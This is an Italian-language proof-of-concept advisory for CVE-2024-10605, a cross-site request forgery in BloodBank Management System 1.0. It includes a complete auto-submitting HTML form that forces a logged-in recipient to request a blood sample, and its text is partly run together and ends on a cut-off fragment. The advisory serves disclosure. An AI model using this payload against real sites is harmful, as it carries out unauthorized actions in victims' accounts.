
Proof-of-concept per CVE-2024-10605, una vulnerabilità CSRF in BloodBank Management System 1.0 che consente richieste non autorizzate di campioni di sangue.
file/request.phpC'è una Cross Site Request Forgery su questo endpoint /file/request.php che consente a un utente remoto di avviare una richiesta di campione di sangue sull'account di un autenticato, dai campioni di sangue disponibili di un ospedale selezionato
riceventeUno sfruttamento riuscito può portare a azioni non autorizzate per conto della vittima. Inoltre, ciò potrebbe essere sfruttato visitando siti web dannosi con il payload.
Di seguito è riportato un esempio di attacco PoC CSRF che avvia una richiesta di campione di sangue dall'account di un ricevente autenticato:
<html>
<head>
<title>CSRF PoC</title>
</head>
<body>
<form action="http://localhost.local/bloodbank/file/request.php" method="POST" enctype="application/x-www-form-urlencoded">
<input name="bid" value="16">
<input name="hid" value="3">
<input name="bg" value="B-">
<input name="request" value="Request+Sample">
</form>
<script>
document.querySelector("form").submit();
</script>
</body>
</html>
token CSRF nella richiesta.